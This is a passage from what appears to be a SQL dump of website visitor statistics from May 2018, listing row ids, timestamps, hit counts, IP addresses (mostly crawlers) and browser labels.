36.149.52','other'),(250713,1527395804,1,1,0,0,'54.36.148.109','other'),(250714,1527395991,1,1,0,0,'54.36.148.158','other'),(250715,1527396384,1,1,0,0,'54.36.148.253','other'),(250716,1527396393,1,1,0,0,'54.36.149.58','other'),(250717,1527396805,1,1,0,0,'54.36.149.26','other'),(250718,1527397024,1,1,0,0,'54.36.148.121','other'),(250719,1527397101,1,1,0,0,'54.36.148.212','other'),(250720,1527397193,1,1,0,0,'8.29.198.25','other'),(250721,1527397365,1,1,0,0,'178.154.171.88','other'),(250722,1527398024,2,2,0,0,'141.8.142.74','other'),(250723,1527398080,1,1,0,0,'54.36.148.84','other'),(250724,1527398155,1,1,0,0,'54.36.149.98','other'),(250725,1527398223,1,1,0,0,'54.36.148.199','other'),(250726,1527398226,1,1,0,0,'54.36.148.232','other'),(250727,1527398351,1,1,0,0,'37.9.113.182','other'),(250728,1527398632,1,1,0,0,'54.36.148.110','other'),(250729,1527399034,1,1,0,0,'54.36.148.91','other'),(250730,1527399145,1,1,0,0,'54.36.149.5','other'),(250731,1527399208,2,2,0,0,'216.244.66.241','other'),(250732,1527399889,1,1,0,0,'178.92.142.181','chrome'),(250733,1527399901,1,1,0,0,'54.36.148.160','other'),(250734,1527400046,1,1,0,0,'54.36.148.112','other'),(250735,1527400370,1,1,0,0,'54.36.149.16','other'),(250736,1527400555,1,1,0,0,'141.8.142.74','other'),(250737,1527400584,1,1,0,0,'13.56.232.243','chrome'),(250738,1527400656,1,1,0,0,'54.36.149.90','other'),(250739,1527400728,1,1,0,0,'54.36.148.187','other'),(250740,1527400887,1,1,0,0,'178.154.171.88','other'),(250741,1527401106,2,2,0,0,'178.92.74.8','chrome'),(250742,1527401236,1,0,1,0,'66.249.64.28',''),(250743,1527401247,1,1,0,0,'54.36.148.59','other'),(250744,1527401294,1,1,0,0,'87.250.224.46','other'),(250745,1527401593,2,2,0,0,'141.8.142.74','other'),(250746,1527401599,1,1,0,0,'54.36.148.121','other'),(250747,1527402043,1,1,0,0,'216.244.66.241','other'),(250748,1527402126,1,1,0,0,'195.137.203.243','chrome'),(250749,1527402552,1,1,0,0,'54.36.148.89','other'),(250750,1527402566,1,1,0,0,'54.36.149.43','other'),(250751,1527402571,1,1,0,0,'95.163.255.95','other'),(250752,1527402765,1,1,0,0,'8.29.198.25','other'),(250753,1527402791,1,1,0,0,'54.36.149.93','other'),(250754,1527402921,2,2,0,0,'144.76.110.229','other'),(250755,1527403067,1,1,0,0,'54.36.149.7','other'),(250756,1527403292,3,3,0,0,'216.244.66.241','other'),(250757,1527403599,1,1,0,0,'178.154.200.41','other'),(250758,1527403700,1,1,0,0,'54.36.148.23','other'),(250759,1527404008,1,1,0,0,'178.154.171.88','other'),(250760,1527404383,2,2,0,0,'216.244.66.241','other'),(250761,1527404577,1,1,0,0,'54.36.149.53','other'),(250762,1527404816,1,1,0,0,'54.36.149.25','other'),(250763,1527404969,1,1,0,0,'108.59.8.70','other'),(250764,1527405960,1,1,0,0,'54.36.148.184','other'),(250765,1527406117,1,1,0,0,'95.163.255.6','other'),(250766,1527406176,1,1,0,0,'54.36.148.105','other'),(250767,1527406209,2,2,0,0,'95.213.141.126','opera'),(250768,1527406217,2,2,0,0,'216.244.66.241','other'),(250769,1527406227,1,1,0,0,'95.163.255.2','other'),(250770,1527407328,1,1,0,0,'54.36.148.104','other'),(250771,1527407543,1,1,0,0,'54.36.148.46','other'),(250772,1527407708,1,1,0,0,'54.36.148.33','other'),(250773,1527407834,1,1,0,0,'54.36.148.32','other'),(250774,1527407875,1,1,0,0,'54.36.148.123','other'),(250775,1527407964,1,0,1,0,'66.249.64.28',''),(250776,1527408030,1,1,0,0,'8.29.198.27','other'),(250777,1527408038,1,1,0,0,'54.36.149.57','other'),(250778,1527408208,2,2,0,0,'141.8.142.74','other'),(250779,1527408291,1,1,0,0,'54.36.148.202','other'),(250780,1527408733,1,1,0,0,'54.36.149.27','other'),(250781,1527408946,1,1,0,0,'157.55.39.134','other'),(250782,1527409131,1,1,0,0,'141.8.142.74','other'),(250783,1527410122,1,1,0,0,'89.178.230.103','msie'),(250784,1527410164,1,1,0,0,'54.36.149.72','other'),(250785,1527410347,1,1,0,0,'54.36.148.196','other'),(250786,1527410369,1,0,1,0,'66.249.64.29',''),(250787,1527410439,1,1,0,0,'54.36.149.43','other'),(250788,1527410808,1,1,0,0,'54.36.148.156','other'),(250789,1527411025,1,1,0,0,'178.154.171.88','other'),(250790,1527411127,1,1,0,0,'54.36.148.79','other'),(250791,1527411783,1,1,0,0,'54.36.148.226','other'),(250792,1527412390,1,1,0,0,'216.244.66.241','other'),(250793,1527412517,1,1,0,0,'54.36.148.246','other'),(250794,1527412633,1,1,0,0,'180.76.15.11','other'),(250795,1527412718,1,1,0,0,'54.36.148.131','other'),(250796,1527413274,1,1,0,0,'54.36.148.119','other'),(250797,1527413441,1,1,0,0,'54.36.148.117','other'),(250798,1527413583,1,1,0,0,'8.29.198.26','other'),(250799,1527413656,1,1,0,0,'54.36.148.116','other'),(250800,1527413782,1,1,0,0,'54.36.148.60','other'),(250801,1527413891,1,1,0,0,'54.36.148.38','other'),(250802,1527413964,1,0,1,0,'66.249.70.27',''),(250803,1527414180,1,1,0,0,'54.36.149.76','other'),(250804,1527414390,1,1,0,0,'54.36.149.40','other'),(250805,1527415023,1,1,0,0,'54.36.149.41','other'),(250806,1527415066,1,1,0,0,'141.8.142.74','other'),(250807,1527415206,1,1,0,0,'157.55.39.134','other'),(250808,1527415521,1,1,0,0,'54.36.148.174','other'),(250809,1527415603,1,1,0,0,'54.36.148.88','other'),(250810,1527416420,1,1,0,0,'54.36.148.45','other'),(250811,1527416438,1,1,0,0,'54.36.148.27','other'),(250812,1527416513,1,1,0,0,'54.36.148.239','other'),(250813,1527416548,1,1,0,0,'54.36.148.236','other'),(250814,1527416823,1,1,0,0,'54.36.148.137','other'),(250815,1527416855,1,1,0,0,'54.36.148.186','other'),(250816,1527417652,1,1,0,0,'54.36.149.92','other'),(250817,1527418099,1,1,0,0,'216.244.66.241','other'),(250818,1527418324,1,1,0,0,'54.36.148.214','other'),(250819,1527418454,1,1,0,0,'54.36.149.104','other'),(250820,1527418655,1,1,0,0,'54.36.149.28','other'),(250821,1527418727,1,1,0,0,'54.36.148.116','other'),(250822,1527418783,1,1,0,0,'54.36.148.103','other'),(250823,1527418822,1,1,0,0,'87.250.224.46','other'),(250824,1527418867,1,1,0,0,'8.29.198.27','other'),(250825,1527419007,1,0,1,0,'66.249.64.29',''),(250826,1527419054,1,1,0,0,'54.36.148.12','other'),(250827,1527419316,1,1,0,0,'54.36.148.126','other'),(250828,1527419794,1,1,0,0,'207.46.13.29','other'),(250829,1527419796,1,1,0,0,'54.36.148.245','other'),(250830,1527419975,1,1,0,0,'66.249.70.25','chrome'),(250831,1527420180,1,1,0,0,'54.36.148.41','other'),(250832,1527420676,1,1,0,0,'54.36.148.238','other'),(250833,1527420731,1,1,0,0,'193.106.30.99','firefox'),(250834,1527420865,1,1,0,0,'54.36.149.9','other'),(250835,1527420873,1,1,0,0,'54.36.149.50','other'),(250836,1527420932,1,0,1,0,'66.249.64.29',''),(250837,1527421436,1,1,0,0,'54.36.149.53','other'),(250838,1527421618,1,1,0,0,'89.185.15.97','firefox'),(250839,1527421691,1,1,0,0,'54.36.149.25','other'),(250840,1527421802,1,1,0,0,'54.36.148.165','other'),(250841,1527421935,1,1,0,0,'54.36.148.38','other'),(250842,1527422330,1,1,0,0,'54.36.149.87','other'),(250843,1527422484,1,1,0,0,'54.36.148.118','other'),(250844,1527422700,2,2,0,0,'216.244.66.241','other'),(250845,1527422736,1,1,0,0,'66.249.83.218','chrome'),(250846,1527422737,1,1,0,0,'66.249.88.157','chrome'),(250847,1527422773,3,3,0,0,'66.249.83.221','chrome'),(250848,1527422781,1,1,0,0,'54.36.148.81','other'),(250849,1527422812,1,1,0,0,'66.249.88.61','chrome'),(250850,1527422936,1,1,0,0,'54.36.149.78','other'),(250851,1527422989,1,0,1,0,'66.249.70.25',''),(250852,1527423211,2,2,0,0,'141.8.142.74','other'),(250853,1527423347,1,1,0,0,'54.165.59.7','other'),(250854,1527423585,1,1,0,0,'54.36.149.107','other'),(250855,1527423705,1,1,0,0,'178.154.171.88','other'),(250856,1527423828,1,1,0,0,'54.36.148.225','other'),(250857,1527424360,1,1,0,0,'54.36.149.17','other'),(250858,1527424409,1,1,0,0,'8.29.198.25','other'),(250859,1527424429,1,1,0,0,'180.76.15.11','other'),(250860,1527424472,1,1,0,0,'54.36.149.54','other'),(250861,1527424531,1,1,0,0,'216.244.66.241','other'),(250862,1527424673,4,4,0,0,'54.165.59.7','other'),(250863,1527424894,1,1,0,0,'54.36.148.42','other'),(250864,1527424946,1,1,0,0,'178.154.171.88','other'),(250865,1527425264,1,1,0,0,'54.36.148.151','other'),(250866,1527425268,1,1,0,0,'54.36.148.145','other'),(250867,1527425478,1,1,0,0,'141.8.142.74','other'),(250868,1527425574,1,1,0,0,'216.244.66.241','other'),(250869,1527425647,1,1,0,0,'91.196.178.135','chrome'),(250870,1527425727,2,2,0,0,'54.165.59.7','other'),(250871,1527425818,1,1,0,0,'54.36.148.83','other'),(250872,1527426089,1,1,0,0,'54.36.148.136','other'),(250873,1527426648,1,1,0,0,'54.36.148.215','other'),(250874,1527427033,1,1,0,0,'180.76.15.144','other'),(250875,1527427045,1,1,0,0,'54.36.148.160','other'),(250876,1527427321,1,1,0,0,'54.36.148.238','other'),(250877,1527427580,1,1,0,0,'54.36.148.158','other'),(250878,1527427721,1,1,0,0,'54.36.148.104','other'),(250879,1527427836,1,1,0,0,'54.36.148.42','other'),(250880,1527428006,1,1,0,0,'54.36.149.58','other'),(250881,1527428022,1,1,0,0,'54.36.148.58','other'),(250882,1527428313,1,1,0,0,'54.36.148.57','other'),(250883,1527428330,1,1,0,0,'54.36.148.41','other'),(250884,1527428434,1,1,0,0,'54.36.149.9','other'),(250885,1527428541,1,1,0,0,'54.36.148.12','other'),(250886,1527428550,1,1,0,0,'54.36.148.13','other'),(250887,1527429184,1,1,0,0,'54.36.148.221','other'),(250888,1527429621,1,1,0,0,'54.36.148.35','other'),(250889,1527429704,1,1,0,0,'8.29.198.26','other'),(250890,1527429885,1,1,0,0,'54.36.149.27','other'),(250891,1527430020,1,0,1,0,'66.249.64.29',''),(250892,1527430626,1,1,0,0,'54.36.149.57','other'),(250893,1527430695,1,1,0,0,'54.36.148.131','other'),(250894,1527430727,3,3,0,0,'216.244.66.241','other'),(250895,1527430854,1,0,1,0,'66.249.64.28',''),(250896,1527431287,1,1,0,0,'54.36.148.80','other'),(250897,1527431892,1,1,0,0,'216.244.66.241','other'),(250898,1527432944,2,2,0,0,'91.196.178.162','chrome'),(250899,1527433536,2,2,0,0,'216.244.66.241','other'),(250900,1527433828,1,1,0,0,'95.163.255.8','other'),(250901,1527435016,1,1,0,0,'141.8.142.74','other'),(250902,1527435227,1,1,0,0,'8.29.198.27','other'),(250903,1527435775,1,1,0,0,'95.163.255.97','other'),(250904,1527436356,1,1,0,0,'178.154.171.88','other'),(250905,1527437483,2,2,0,0,'216.244.66.241','other'),(250906,1527437949,1,1,0,0,'130.180.209.168','chrome'),(250907,1527438247,1,1,0,0,'141.8.142.74','other'),(250908,1527438353,1,1,0,0,'91.209.11.236','other'),(250909,1527438615,1,0,1,0,'66.249.64.29',''),(250910,1527438622,3,3,0,0,'216.244.66.241','other'),(250911,1527440538,1,1,0,0,'8.29.198.27','other'),(250912,1527440672,1,0,1,0,'66.249.64.28',''),(250913,1527440957,1,1,0,0,'95.163.255.98','other'),(250914,1527441347,1,0,1,0,'66.249.64.29',''),(250915,1527441387,1,1,0,0,'216.244.66.241','other'),(250916,1527441926,1,1,0,0,'141.8.142.74','other'),(250917,1527442470,1,0,1,0,'66.249.64.29',''),(250918,1527442975,2,2,0,0,'216.244.66.241','other'),(250919,1527443112,1,1,0,0,'178.154.171.88','other'),(250920,1527443134,1,1,0,0,'141.8.142.74','other'),(250921,1527443369,1,1,0,0,'66.249.64.29','chrome'),(250922,1527443530,1,0,1,0,'66.249.70.25',''),(250923,1527444146,1,1,0,0,'141.8.142.74','other'),(250924,1527444181,2,2,0,0,'216.244.66.241','other'),(250925,1527444612,22,22,0,0,'142.4.200.37','other'),(250926,1527444957,1,1,0,0,'95.163.255.92','other'),(250927,1527446050,1,1,0,0,'8.29.198.26','other'),(250928,1527446054,1,1,0,0,'87.250.224.46','other'),(250929,1527446622,2,2,0,0,'216.244.66.241','other'),(250930,1527447286,1,1,0,0,'141.8.142.74','other'),(250931,1527449384,2,2,0,0,'141.8.142.74','other'),(250932,1527449414,1,1,0,0,'54.36.148.19','other'),(250933,1527449565,1,1,0,0,'54.36.148.154','other'),(250934,1527449773,2,2,0,0,'178.154.171.88','other'),(250935,1527449897,1,1,0,0,'54.36.149.3','other'),(250936,1527450827,1,1,0,0,'54.36.148.228','other'),(250937,1527451136,1,1,0,0,'178.154.171.88','other'),(250938,1527451142,1,1,0,0,'54.36.148.185','other'),(250939,1527451372,1,1,0,0,'8.29.198.26','other'),(250941,1527451399,1,1,0,0,'54.36.149.52','other'),(250942,1527451517,2,2,0,0,'141.8.142.74','other'),(250943,1527451540,1,1,0,0,'54.36.148.157','other'),(250944,1527451629,1,1,0,0,'54.36.148.235','other'),(250945,1527451666,1,1,0,0,'54.36.148.229','other'),(250946,1527452222,1,1,0,0,'54.36.149.93','other'),(250947,1527452290,1,1,0,0,'54.36.149.0','other'),(250948,1527452317,1,1,0,0,'157.55.39.172','other'),(250949,1527452578,1,1,0,0,'54.36.148.135','other'),(250950,1527452714,1,1,0,0,'54.36.148.222','other'),(250951,1527453228,1,1,0,0,'54.36.148.234','other'),(250952,1527453332,1,1,0,0,'178.154.171.88','other'),(250953,1527453386,1,1,0,0,'54.36.148.213','other'),(250954,1527453390,1,1,0,0,'54.36.148.245','other'),(250955,1527453435,1,1,0,0,'216.244.66.241','other'),(250956,1527453872,4,4,0,0,'141.8.142.74','other'),(250957,1527453910,1,0,1,0,'66.249.64.29',''),(250958,1527454084,1,1,0,0,'54.36.149.32','other'),(250959,1527454193,1,1,0,0,'54.36.148.36','other'),(250960,1527454858,1,1,0,0,'47.106.37.223','other'),(250961,1527455244,3,3,0,0,'141.8.142.74','other'),(250962,1527455528,1,1,0,0,'54.36.149.4','other'),(250963,1527455959,1,1,0,0,'109.251.122.126','chrome'),(250964,1527456068,1,1,0,0,'54.36.148.198','other'),(250965,1527456129,1,1,0,0,'216.244.66.241','other'),(250966,1527456440,1,1,0,0,'54.36.148.123','other'),(250967,1527456561,1,1,0,0,'54.36.148.33','other'),(250968,1527456667,1,1,0,0,'54.36.149.71','other'),(250969,1527456786,1,1,0,0,'54.36.148.104','other'),(250970,1527456875,1,1,0,0,'8.29.198.25','other'),(250971,1527456905,1,1,0,0,'54.36.148.160','other'),(250972,1527456993,1,1,0,0,'54.36.149.98','other'),(250973,1527457050,1,1,0,0,'54.36.148.185','other'),(250974,1527457223,2,2,0,0,'216.244.66.241','other'),(250975,1527457316,1,0,1,0,'66.249.64.29',''),(250976,1527457330,1,0,1,0,'66.249.64.30',''),(250977,1527457388,1,1,0,0,'54.36.148.209','other'),(250978,1527457530,1,1,0,0,'54.36.149.0','other'),(250979,1527457795,1,1,0,0,'54.36.148.188','other'),(250980,1527457897,1,1,0,0,'54.36.148.211','other'),(250981,1527458502,1,1,0,0,'163.172.4.153','chrome'),(250982,1527458758,1,1,0,0,'216.244.66.241','other'),(250983,1527459318,1,1,0,0,'54.36.149.82','other'),(250984,1527459588,1,1,0,0,'54.36.149.30','other'),(250985,1527459644,1,1,0,0,'54.36.149.34','other'),(250986,1527459734,1,1,0,0,'141.8.142.74','other'),(250987,1527459813,1,1,0,0,'54.36.149.52','other'),(250988,1527460132,2,2,0,0,'54.36.148.182','other'),(250989,1527460208,1,1,0,0,'216.244.66.241','other'),(250990,1527460252,1,1,0,0,'157.55.39.134','other'),(250991,1527460321,1,1,0,0,'54.36.149.64','other'),(250992,1527461126,1,1,0,0,'141.8.142.74','other'),(250993,1527461196,3,3,0,0,'216.244.66.241','other'),(250994,1527461310,1,1,0,0,'54.36.148.193','other'),(250995,1527462023,1,1,0,0,'54.36.149.107','other'),(250996,1527462136,1,1,0,0,'54.36.148.181','other'),(250997,1527462221,1,1,0,0,'8.29.198.25','other'),(250998,1527462688,1,1,0,0,'54.36.149.92','other'),(250999,1527462734,1,1,0,0,'54.36.149.6','other'),(251000,1527462827,1,1,0,0,'54.36.148.111','other'),(251001,1527463275,1,1,0,0,'54.36.149.85','other'),(251002,1527463333,1,1,0,0,'54.36.148.31','other'),(251003,1527463437,1,1,0,0,'141.8.142.74','other'),(251004,1527463585,1,1,0,0,'54.36.148.201','other'),(251005,1527463891,1,1,0,0,'178.154.200.41','other'),(251006,1527464193,1,0,1,0,'66.249.64.29',''),(251007,1527464418,1,1,0,0,'54.36.148.12','other'),(251008,1527464590,1,1,0,0,'54.36.149.6','other'),(251009,1527464635,1,1,0,0,'178.154.171.88','other'),(251010,1527465385,1,1,0,0,'54.36.148.99','other'),(251011,1527465414,1,1,0,0,'54.36.148.154','other'),(251012,1527465476,1,1,0,0,'54.36.148.93','other'),(251013,1527465538,1,1,0,0,'54.36.149.98','other'),(251014,1527465567,2,2,0,0,'216.244.66.241','other'),(251015,1527465634,1,1,0,0,'141.8.142.74','other'),(251016,1527465874,1,1,0,0,'95.163.255.6','other'),(251017,1527466137,1,1,0,0,'54.36.148.195','other'),(251018,1527466314,1,1,0,0,'157.55.39.134','other'),(251019,1527466402,1,1,0,0,'54.36.148.12','other'),(251020,1527466420,1,1,0,0,'54.36.148.19','other'),(251021,1527466749,1,1,0,0,'216.244.66.241','other'),(251022,1527467017,1,1,0,0,'207.46.13.30','other'),(251023,1527467034,1,1,0,0,'95.163.255.9','other'),(251024,1527467518,1,1,0,0,'54.36.148.188','other'),(251025,1527467693,1,1,0,0,'8.29.198.26','other'),(251026,1527467798,1,1,0,0,'54.36.148.225','other'),(251027,1527467835,1,1,0,0,'54.36.148.35','other'),(251028,1527467927,2,2,0,0,'216.244.66.241','other'),(251029,1527468244,1,1,0,0,'54.36.148.228','other'),(251030,1527468465,1,1,0,0,'54.36.148.63','other'),(251031,1527468521,1,1,0,0,'54.36.148.189','other'),(251032,1527468892,1,0,1,0,'66.249.64.29',''),(251033,1527468946,1,1,0,0,'141.8.142.74','other'),(251034,1527469107,1,1,0,0,'54.36.149.48','other'),(251035,1527469392,1,0,1,0,'66.249.64.17',''),(251036,1527469416,1,1,0,0,'54.36.149.52','other'),(251037,1527469786,1,1,0,0,'54.36.148.89','other'),(251038,1527469872,2,2,0,0,'141.8.142.74','other'),(251039,1527469992,1,1,0,0,'178.154.171.88','other'),(251040,1527470236,1,1,0,0,'180.76.15.161','other'),(251041,1527470257,1,0,1,0,'66.249.64.28',''),(251042,1527470482,1,1,0,0,'54.36.148.198','other'),(251043,1527470627,1,1,0,0,'216.244.66.241','other'),(251044,1527470953,1,1,0,0,'54.36.148.252','other'),(251045,1527471476,1,1,0,0,'141.8.142.74','other'),(251046,1527472359,1,1,0,0,'216.244.66.241','other'),(251047,1527472615,1,1,0,0,'54.36.149.14','other'),(251048,1527472617,1,1,0,0,'178.154.171.88','other'),(251049,1527472715,1,1,0,0,'54.36.149.71','other'),(251050,1527473054,1,1,0,0,'8.29.198.25','other'),(251051,1527473088,1,1,0,0,'157.55.39.172','other'),(251052,1527473322,1,1,0,0,'54.36.149.77','other'),(251053,1527473640,1,1,0,0,'54.36.149.54','other'),(251054,1527473773,1,1,0,0,'54.36.149.79','other'),(251055,1527473845,1,1,0,0,'54.36.148.234','other'),(251056,1527474725,1,1,0,0,'180.76.15.148','other'),(251057,1527474966,1,1,0,0,'54.36.149.88','other'),(251058,1527475101,1,0,1,0,'66.249.64.30',''),(251059,1527475181,1,1,0,0,'54.36.148.204','other'),(251060,1527475709,1,1,0,0,'178.154.171.88','other'),(251061,1527475777,1,1,0,0,'54.36.148.100','other'),(251062,1527475851,1,1,0,0,'54.36.148.66','other'),(251063,1527475857,2,2,0,0,'216.244.66.241','other'),(251064,1527475892,1,1,0,0,'54.36.148.201','other'),(251065,1527476026,1,1,0,0,'54.36.149.33','other'),(251066,1527476035,1,1,0,0,'54.36.148.36','other'),(251067,1527476134,1,1,0,0,'141.8.142.74','other'),(251068,1527476442,1,1,0,0,'54.36.148.171','other'),(251069,1527476713,1,1,0,0,'95.163.255.9','other'),(251070,1527476790,1,1,0,0,'54.36.148.43','other'),(251071,1527477018,1,1,0,0,'54.165.59.7','other'),(251072,1527477251,1,1,0,0,'54.36.149.69','other'),(251073,1527477658,1,1,0,0,'54.36.148.107','other'),(251074,1527478500,1,1,0,0,'54.36.148.95','other'),(251075,1527478526,1,1,0,0,'8.29.198.26','other'),(251076,1527478840,1,1,0,0,'54.36.149.40','other'),(251077,1527478988,1,1,0,0,'207.46.13.30','other'),(251078,1527479580,1,1,0,0,'54.36.149.43','other'),(251079,1527479675,1,1,0,0,'54.36.148.214','other'),(251080,1527479834,1,1,0,0,'216.244.66.241','other'),(251081,1527480671,1,1,0,0,'54.36.148.167','other'),(251082,1527480955,1,1,0,0,'54.36.149.50','other'),(251083,1527481093,1,1,0,0,'80.93.187.57','chrome'),(251084,1527481095,1,1,0,0,'54.36.148.103','other'),(251085,1527481147,3,3,0,0,'216.244.66.241','other'),(251086,1527481434,1,1,0,0,'54.36.148.236','other'),(251087,1527481595,1,1,0,0,'54.36.148.113','other'),(251088,1527481965,1,1,0,0,'54.36.149.29','other'),(251089,1527482345,1,1,0,0,'54.36.148.224','other'),(251090,1527482429,1,1,0,0,'54.36.149.77','other'),(251091,1527482482,2,2,0,0,'216.244.66.241','other'),(251092,1527482491,1,1,0,0,'54.36.149.4','other'),(251093,1527482634,1,1,0,0,'54.36.148.32','other'),(251094,1527482795,1,0,1,0,'66.249.64.30',''),(251095,1527483637,1,1,0,0,'216.244.66.241','other'),(251096,1527483799,1,1,0,0,'54.36.148.20','other'),(251097,1527483850,1,1,0,0,'54.36.149.17','other'),(251098,1527483881,1,1,0,0,'8.29.198.26','other'),(251099,1527484034,4,4,0,0,'144.76.104.213','other'),(251100,1527484079,1,1,0,0,'54.36.149.24','other'),(251101,1527484087,1,1,0,0,'54.36.148.124','other'),(251102,1527484438,1,0,1,0,'66.249.64.30',''),(251104,1527484705,1,1,0,0,'54.36.148.40','other'),(251105,1527485044,1,1,0,0,'54.36.148.246','other'),(251106,1527485143,1,1,0,0,'95.163.255.98','other'),(251107,1527485182,1,1,0,0,'95.163.255.18','other'),(251108,1527485402,1,1,0,0,'54.36.148.138','other'),(251109,1527485601,14,14,0,0,'144.76.76.104','other'),(251110,1527485676,1,1,0,0,'54.36.149.90','other'),(251111,1527485765,1,1,0,0,'95.163.255.93','other'),(251112,1527485806,21,21,0,0,'69.30.213.82','other'),(251113,1527485843,1,1,0,0,'54.36.149.17','other'),(251114,1527485924,1,1,0,0,'54.36.148.243','other'),(251115,1527486412,1,1,0,0,'54.36.149.97','other'),(251116,1527486725,1,1,0,0,'54.36.149.63','other'),(251117,1527487327,1,0,1,0,'66.249.64.28',''),(251118,1527487338,1,1,0,0,'54.36.148.254','other'),(251119,1527487549,1,1,0,0,'54.36.148.13','other'),(251120,1527487550,1,1,0,0,'54.36.148.11','other'),(251121,1527487840,2,2,0,0,'216.244.66.241','other'),(251122,1527488182,1,1,0,0,'91.196.178.129','chrome'),(251123,1527488380,1,0,1,0,'66.249.64.28',''),(251124,1527488435,1,1,0,0,'54.36.149.38','other'),(251125,1527488749,1,1,0,0,'54.36.149.89','other'),(251126,1527488887,1,1,0,0,'54.36.148.48','other'),(251127,1527489345,1,1,0,0,'8.29.198.27','other'),(251128,1527489369,1,1,0,0,'54.36.148.138','other'),(251129,1527489388,2,0,2,0,'66.249.64.29',''),(251130,1527489475,1,1,0,0,'54.36.148.226','other'),(251131,1527489535,1,1,0,0,'54.36.148.129','other'),(251132,1527489709,1,1,0,0,'54.36.148.117','other'),(251133,1527490015,1,1,0,0,'91.196.178.98','chrome'),(251134,1527490041,1,1,0,0,'207.46.13.30','other'),(251135,1527490253,1,0,1,0,'66.249.64.28',''),(251136,1527490274,1,1,0,0,'91.215.58.193','chrome'),(251137,1527490285,1,1,0,0,'54.36.148.47','other'),(251138,1527490381,2,2,0,0,'216.244.66.241','other'),(251139,1527490464,1,0,1,0,'66.249.70.25',''),(251140,1527490925,1,1,0,0,'178.154.171.88','other'),(251141,1527491192,1,1,0,0,'54.36.148.57','other'),(251142,1527491226,1,1,0,0,'54.36.149.61','other'),(251143,1527491689,1,1,0,0,'216.244.66.241','other'),(251144,1527491936,1,1,0,0,'54.36.148.175','other'),(251145,1527492002,1,1,0,0,'66.249.70.27','chrome'),(251146,1527492055,1,0,1,0,'66.249.64.28',''),(251147,1527492129,1,1,0,0,'95.163.255.13','other'),(251148,1527492483,1,1,0,0,'54.36.148.36','other'),(251149,1527492543,1,1,0,0,'54.36.148.114','other'),(251150,1527492651,1,1,0,0,'54.36.148.221','other'),(251151,1527492792,1,1,0,0,'54.36.149.6','other'),(251152,1527493119,1,1,0,0,'54.36.148.214','other'),(251153,1527493273,1,1,0,0,'54.36.149.92','other'),(251154,1527493380,1,1,0,0,'216.244.66.241','other'),(251155,1527494281,3,3,0,0,'216.244.66.241','other'),(251156,1527494388,1,1,0,0,'54.36.148.119','other'),(251157,1527494418,1,1,0,0,'54.36.148.232','other'),(251158,1527494621,1,1,0,0,'95.163.255.98','other'),(251159,1527494715,1,1,0,0,'8.29.198.26','other'),(251160,1527495518,1,1,0,0,'54.36.148.182','other'),(251161,1527495766,1,1,0,0,'54.36.148.48','other'),(251162,1527496105,1,1,0,0,'95.163.255.93','other'),(251163,1527496228,1,1,0,0,'157.55.39.69','other'),(251164,1527496266,1,1,0,0,'54.36.149.57','other'),(251165,1527496524,1,1,0,0,'54.36.148.42','other'),(251166,1527496863,1,1,0,0,'54.36.148.95','other'),(251167,1527496964,1,1,0,0,'216.244.66.241','other'),(251168,1527497009,1,1,0,0,'66.249.64.30','chrome'),(251169,1527498292,1,1,0,0,'54.36.149.88','other'),(251170,1527498302,1,1,0,0,'54.36.148.153','other'),(251171,1527498405,1,1,0,0,'54.36.148.101','other'),(251172,1527498484,4,4,0,0,'216.244.66.241','other'),(251173,1527498495,1,1,0,0,'95.163.255.5','other'),(251174,1527498760,1,0,1,0,'66.249.64.28',''),(251175,1527498765,1,1,0,0,'54.36.148.201','other'),(251176,1527498769,1,1,0,0,'54.36.149.65','other'),(251177,1527498813,1,0,1,0,'66.249.70.25',''),(251178,1527498964,1,1,0,0,'95.134.220.251','chrome'),(251179,1527499397,1,1,0,0,'54.36.148.154','other'),(251180,1527500020,2,2,0,0,'216.244.66.241','other'),(251181,1527500153,40,40,0,0,'54.224.91.58','other'),(251182,1527500177,1,1,0,0,'8.29.198.27','other'),(251183,1527500486,1,1,0,0,'54.36.148.53','other'),(251184,1527500700,1,0,1,0,'66.249.64.28',''),(251185,1527500702,1,1,0,0,'54.36.148.69','other'),(251186,1527500800,1,1,0,0,'54.36.149.79','other'),(251187,1527501072,19,19,0,0,'54.224.91.58','other'),(251188,1527501558,1,1,0,0,'157.55.39.114','other'),(251189,1527501564,1,1,0,0,'54.36.148.50','other'),(251190,1527501763,1,1,0,0,'54.36.148.28','other'),(251191,1527502244,1,1,0,0,'54.36.149.104','other'),(251192,1527502559,1,1,0,0,'216.244.66.241','other'),(251193,1527502936,1,0,1,0,'66.249.64.28',''),(251194,1527503038,1,1,0,0,'54.36.148.178','other'),(251195,1527503186,1,1,0,0,'54.36.148.171','other'),(251196,1527503359,1,0,1,0,'66.249.64.29',''),(251197,1527503559,1,0,1,0,'66.249.64.30',''),(251198,1527503783,1,1,0,0,'54.36.148.124','other'),(251199,1527503852,1,0,1,0,'66.249.64.28',''),(251200,1527503972,1,1,0,0,'54.36.148.135','other'),(251201,1527503996,1,1,0,0,'85.159.3.239','chrome'),(251202,1527504373,1,1,0,0,'54.36.148.63','other'),(251203,1527504648,1,1,0,0,'178.154.171.88','other'),(251204,1527504874,2,2,0,0,'216.244.66.241','other'),(251205,1527505044,1,1,0,0,'54.36.148.141','other'),(251206,1527505283,1,0,1,0,'66.249.64.29',''),(251207,1527505497,1,0,1,0,'66.249.64.30',''),(251208,1527505552,1,1,0,0,'8.29.198.25','other'),(251209,1527506050,1,0,1,0,'66.249.64.28',''),(251210,1527506145,1,1,0,0,'54.36.149.10','other'),(251211,1527506357,1,1,0,0,'54.36.148.42','other'),(251212,1527506572,1,1,0,0,'54.36.148.145','other'),(251213,1527506923,1,1,0,0,'54.36.149.96','other'),(251214,1527507616,2,2,0,0,'216.244.66.241','other'),(251215,1527507779,1,1,0,0,'95.163.255.97','other'),(251216,1527508194,1,1,0,0,'178.154.171.88','other'),(251217,1527508212,1,1,0,0,'54.36.148.33','other'),(251218,1527508215,1,1,0,0,'54.36.148.99','other'),(251219,1527508280,1,1,0,0,'54.36.148.30','other'),(251220,1527508613,1,0,1,0,'66.249.64.29',''),(251221,1527508648,1,1,0,0,'54.36.148.206','other'),(251222,1527508792,1,1,0,0,'178.92.74.8','chrome'),(251223,1527509001,2,2,0,0,'141.8.142.74','other'),(251224,1527509129,1,0,1,0,'66.249.64.30',''),(251225,1527509421,1,1,0,0,'54.36.148.61','other'),(251226,1527509874,1,1,0,0,'54.36.148.232','other'),(251227,1527510291,2,1,1,0,'66.249.64.29',''),(251228,1527510297,1,1,0,0,'54.36.148.51','other'),(251229,1527510572,1,1,0,0,'216.244.66.241','other'),(251230,1527510675,1,1,0,0,'141.8.142.74','other'),(251231,1527510813,1,1,0,0